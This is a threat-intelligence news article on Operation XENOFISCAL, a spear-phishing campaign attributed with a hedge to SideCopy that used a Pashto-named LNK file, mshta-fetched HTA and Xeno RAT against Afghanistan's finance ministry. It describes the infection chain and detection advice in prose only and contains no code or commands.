SideCopy Hits Afghanistan's Finance Ministry With Xeno RAT in Operation XENOFISCAL

The lure is the tell: a shortcut file with a Pashto-language name, aimed at the one ministry that moves a government's money. This is patient, language-aware espionage, executed with a remote access trojan anyone can download.

PUNE, India — Seqrite Labs has disclosed a spear-phishing campaign, codenamed Operation XENOFISCAL, that it assesses was likely undertaken by the Pakistan-aligned threat group SideCopy against Afghanistan's Ministry of Finance, deploying the open-source remote access trojan Xeno RAT. The Hacker News reported the findings on June 2, 2026.

Beyond the finance ministry itself, Seqrite says the campaign also targeted provincial revenue and finance directorates, Pashto-speaking government officials and provincial-level government employees — a target set, and a choice of lure language, that the researchers read as reflecting close familiarity with the Afghan government environment.

What Happened

Seqrite Labs researcher Dixit Panchal documented a spear-phishing operation, codenamed Operation XENOFISCAL, that the firm assesses was likely carried out by SideCopy — a Pakistan-aligned threat group that operates under the broader Transparent Tribe, or APT36, umbrella — against Afghanistan's Ministry of Finance. The campaign also reached provincial revenue and finance directorates, Pashto-speaking government officials and provincial-level government employees. As Panchal put it, the operation 'opens with a spear phishing delivery — a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename.' Pashto is the main language of Afghan government circles, and Seqrite reads its use in the lure as a deliberate signal of the attacker's familiarity with the target environment.

Once the shortcut file runs, it uses the Windows utility mshta.exe to fetch a remote HTML Application from a compromised Afghan education domain, executing obfuscated JavaScript in memory. The malware establishes Registry-based persistence by mimicking Microsoft Edge and, through a DLL-based loader, drops Xeno RAT version 1.8.7 alongside a decoy document used as a distraction. Xeno RAT is an open-source remote access trojan that connects to a remote server over TCP and accepts operator commands; Seqrite documents a broad capability set including modular DLL loading, scheduled-task launch, antivirus reconnaissance, SOCKS5 proxy tunneling, file operations, keylogging, screenshots, clipboard monitoring, webcam and microphone tracking, the ability to delete its own persistence, and self-uninstallation.

Who SideCopy Is — and the Hedge That Belongs on It

SideCopy is the name researchers give to a Pakistan-linked threat group that operates under the wider Transparent Tribe, also known as APT36, umbrella, and that has historically used a range of malware families to steal data from compromised hosts. It is worth preserving the qualifier Seqrite itself uses: the firm frames XENOFISCAL as a campaign 'likely' undertaken by SideCopy, not a confirmed one, and 'Pakistan-aligned' or 'Pakistan-linked' is the careful phrasing rather than a flat statement of state direction. That precision matters in attribution reporting, where the gap between 'consistent with a known group's tradecraft' and 'definitively attributed' is real. What is well-established is the lineage: in April 2025 SideCopy was tied to a set of attacks on Indian sectors using Xeno RAT, Spark RAT and CurlBack RAT, and the Afghan finance-ministry campaign reads as a continuation of that broader cluster of activity aimed at South Asian entities.

Pakistan-Afghanistan Friction Moves Into the Cyber Domain

The target selection is the geopolitics. A campaign aimed squarely at Afghanistan's Ministry of Finance, its provincial revenue and finance directorates, and Pashto-speaking officials is an espionage operation against the financial machinery of the Afghan state — and the deliberate use of Pashto in the lure file shows an operator who understands that machinery from the inside. Read alongside SideCopy's documented history of targeting India, the campaign fits a pattern of a Pakistan-aligned actor conducting cyber-espionage across its immediate strategic neighborhood. For defenders, the practical implication is one of scope: organizations that touch the Afghan government, run NGO operations in Afghanistan, or handle Afghan diaspora and cross-border financial communications should consider themselves potentially in SideCopy's sights, and treat Pashto-language government-themed attachments with corresponding suspicion.

Off-the-Shelf RATs in State-Aligned Hands

The choice of Xeno RAT — an open-source trojan anyone can download — is part of a durable trend: state-aligned operators increasingly reach for off-the-shelf and open-source tooling rather than bespoke implants, because commodity tools are cheaper, give a degree of attribution deniability, and blend into the noise of criminal activity. The CyberSignal has tracked the same convergence across alignments: the Kimsuky HTTPSpy backdoor aimed at the South Korean military, the Kimsuky PebbleDash activity hitting defense sectors with LLM-developed code, the WebWorm cluster's use of Discord and OneDrive for command-and-control, Iran's Nimbus Manticore aviation-sector targeting and MuddyWater's false-flag tradecraft, and China's Shadow Earth-053 espionage across Asia. SideCopy adopting Xeno RAT is the South Asian entry in that same ledger — and a reminder that the open-source-RAT baseline now spans Russian, Chinese, Iranian, North Korean and Pakistani-aligned operators alike.

Scope and Impact

The direct victims are Afghan government finance entities, which bounds the immediate impact to a specific geopolitical theater. But the relevant scope for most defenders is the lure mechanics rather than the named target, because the techniques generalize cleanly. A ZIP-delivered LNK file that invokes mshta.exe to pull a remote HTA, runs JavaScript in memory, and persists by impersonating a browser is a portable tradecraft pattern, not an Afghanistan-specific one. Any organization whose users open attachments — which is to say, every organization — should recognize the LNK-via-ZIP and mshta-fetches-HTA chain as a high-signal detection opportunity regardless of whether SideCopy is the actor. The use of a compromised Afghan education domain to stage the second-stage HTA is also instructive: the operators borrowed legitimate, regionally appropriate infrastructure to host their payload, which both improves the lure's credibility and frustrates simple domain-reputation blocking, since the host is a real institution rather than a freshly registered attacker domain.

On the malware itself, Xeno RAT 1.8.7's capability list is the espionage operator's standard kit: persistent remote control, keystroke and screen capture, clipboard and audio/video surveillance, file theft, and network tunneling for pivoting. Because it is open-source and versioned, defenders benefit from the fact that its network signature and behaviors are documented in public pentest and threat-intelligence literature — a rare case where the commodity nature of the tool aids the defender. The decoy document dropped alongside it is the social-engineering finishing touch: it gives the victim something plausible to look at while the RAT installs, which is exactly the kind of detail that makes a Pashto-language government lure effective against a busy ministry employee.

Response and Attribution

For organizations in or adjacent to SideCopy's target set — Afghan government bodies, NGOs operating in Afghanistan, and entities handling Afghan cross-border or diaspora communications — the response starts at the email gateway: inspect inbound ZIP attachments for embedded LNK files, treat shortcut files arriving by email as hostile by default, and apply elevated scrutiny to government-themed or Pashto-language attachments. Detection engineering should flag the specific chain Seqrite documents — LNK spawning mshta.exe, mshta reaching out to fetch an HTA, and new Registry run-keys that impersonate Microsoft Edge — and hunt for Xeno RAT's documented TCP command-and-control behavior, with teams pivoting onto Seqrite's published indicators of compromise as soon as they are available.

On attribution, the disciplined position is to carry Seqrite's hedge through: this is a campaign 'likely' run by SideCopy, a 'Pakistan-aligned' group under the Transparent Tribe umbrella, and the evidence is consistency of tradecraft and target rather than a definitive fingerprint. That is a strong assessment worth acting on, but it is an assessment, and reporting it as settled fact would overstate what the research claims. SOC and threat-intelligence teams should treat the SideCopy / Transparent Tribe TTPs as the working hypothesis when they see this chain against South Asian government targets, while leaving room for the possibility — inherent to commodity tooling like Xeno RAT — that a different operator borrowed the same playbook.

The CyberSignal Analysis

Signal 01 — The Lure Language Is the Intelligence

It is easy to focus on Xeno RAT and miss that the most revealing artifact in this campaign is the filename. A shortcut file with a carefully crafted Pashto-language name, aimed at the Afghan finance ministry and Pashto-speaking officials, is not a generic phishing blast — it is a lure built by someone who knows that Pashto is the working language of Afghan government circles and who tailored the bait accordingly. For defenders, that is both a threat indicator and a defensive lesson: language-aware, target-specific lures defeat the generic 'looks like spam' heuristic that catches mass phishing, and the populations most exposed to this kind of operation need training and filtering tuned to their actual linguistic and bureaucratic context, not a one-size-fits-all model built around English-language commodity phishing.

Signal 02 — Open-Source RATs Are the New Common Tongue of Espionage

Xeno RAT in SideCopy's hands is one more data point in a trend that has become the rule rather than the exception: state-aligned operators across every major alignment now reach for open-source and off-the-shelf remote access trojans. The strategic logic is sound from the attacker's side — commodity tools are free, capable, and muddy attribution by making a state operation look like routine crime. The defensive implication cuts both ways. On one hand, an organization can no longer infer a sophisticated adversary from a commodity tool, because Xeno RAT is equally at home in a criminal kit and a state campaign. On the other, the public documentation of these tools is a gift: their behaviors and network signatures are known, so detection content for the open-source-RAT baseline protects against a wide range of actors at once. Building robust detection for the common tools is now higher-leverage than chasing bespoke implants.

Signal 03 — South Asia Is an Under-Covered but Active Theater

Russian, Chinese, Iranian and North Korean operations dominate Western threat-intelligence attention, but the South Asian APT cluster — SideCopy, Transparent Tribe and their counterparts — is consistently active and consistently under-covered relative to its operational tempo. Operation XENOFISCAL is a reminder that Pakistan-Afghanistan and Pakistan-India strategic competition plays out in the cyber domain as routine background activity, with real government targets and real espionage outcomes. For organizations with any footprint in the region, the takeaway is to give South Asian state-aligned threats the same standing in the threat model that the better-publicized clusters already enjoy, rather than treating them as a regional footnote — the targeting is specific, the tooling is capable, and the operational cadence is steady.

Sources